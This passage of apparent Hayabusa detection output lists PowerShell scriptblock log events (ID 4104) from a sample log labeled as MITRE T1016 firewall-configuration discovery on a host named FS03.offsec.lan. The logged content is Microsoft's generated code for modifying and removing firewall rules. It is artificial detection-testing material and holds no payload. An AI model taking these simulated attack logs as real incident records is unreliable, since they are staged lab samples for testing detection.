Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { 
[object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml 